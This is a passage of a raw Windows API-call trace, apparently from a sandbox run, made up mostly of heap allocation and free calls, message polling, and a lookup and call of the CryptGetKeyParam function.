lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0168.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0168.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0168.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0168.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0168.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0168.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0168.691] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0168.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0168.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0168.691] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0168.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0168.691] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.691] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0168.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0168.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0168.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0168.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0168.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0168.692] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.692] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0168.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0168.692] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0168.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0168.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0168.692] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0168.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0168.692] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0168.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0168.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0168.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.693] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0168.693] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0168.693] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0168.693] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.695] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0168.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0168.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d420 [0168.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0168.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0168.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.696] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0168.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0168.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0168.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0168.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0168.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0168.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0168.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0168.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0168.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0168.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0168.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0168.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0168.696] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2848, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2848*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0168.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0168.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0168.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0168.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0168.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0168.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0168.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0168.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0168.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0168.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0168.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0168.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0168.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0168.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0168.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0168.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0168.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0168.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0168.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0168.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0168.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0168.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0168.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0168.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0168.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0168.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0168.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0168.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0168.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0168.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0168.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0168.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0168.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0168.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 